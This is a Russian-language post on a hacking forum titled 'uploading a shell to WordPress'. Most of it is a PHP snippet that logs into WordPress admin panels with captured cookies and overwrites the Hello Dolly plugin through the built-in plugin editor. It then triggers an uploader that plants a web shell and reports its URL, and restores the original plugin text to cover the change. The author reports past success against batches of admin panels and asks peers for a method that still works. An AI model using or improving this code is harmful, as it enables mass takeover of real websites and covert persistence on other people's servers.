Заливка шелла в wordpress

01.08.2022, 13:11

Storks

Guest

Сообщений: n/a

Провел на форуме:
1825

Репутация: 0

Понадобился скрипт для заливки шеллов в вп, нашел свою старую наработку через плагин Hello Dolly, вот ключевой кусок который показывает концепцию

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$hello_edit[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'http://'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/wp-admin/plugin-editor.php?file=hello.php'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$hello_path[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'http://'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/wp-content/plugins/hello.php'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$plugin_editor[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'http://'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$path[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/wp-admin/plugin-editor.php'[/COLOR][COLOR="#007700"];
 
[/COLOR][COLOR="#0000BB"]$response[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curlPostCookies[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$hello_edit[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$cookies[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]extractFormData[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$response[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]//var_dump($data);
    //var_dump($code);
    //exit();
[/COLOR][COLOR="#0000BB"]$code[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]urlencode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$code[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$response[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curlPostCookies[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$plugin_editor[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'&newcontent='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$code[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$cookies[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$response[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curlGet[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$hello_path[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#FF8000"]//var_dump($response);
[/COLOR][COLOR="#0000BB"]preg_match[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'~url:(.+)~'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$response[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$matches[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$matches[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#FF8000"]//echo $url;
[/COLOR][COLOR="#0000BB"]$response[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curlPostCookies[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$hello_edit[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$cookies[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]extractFormData[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$response[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$response[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]curlPostCookies[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$hello_edit[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$data[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'&newcontent='[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]urlencode[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$hello_dolly_text[/COLOR][COLOR="#007700"]),[/COLOR][COLOR="#0000BB"]$cookies[/COLOR][COLOR="#007700"]);
    if([/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"])
        return[/COLOR][COLOR="#0000BB"]$url[/COLOR][COLOR="#007700"];
    return[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"];[/COLOR][/COLOR]

Суть ясна - меняем текст плагина на наш пхп код (в моем случае это заливщик который ищет папку на запись и выдает урл куда загрузился шелл). Года три назад пробив был нормальным в принципе, 10% шеллов с пачки админок получалось, сейчас это вообще не работает, практически ни один шелл не залился. Мб что-то поменялось с тех пор или waf стали настолько продвинутыми? Может есть какой-то более адекватный способ грузится?

ANTICHAT — форум по информационной безопасности, OSINT и технологиям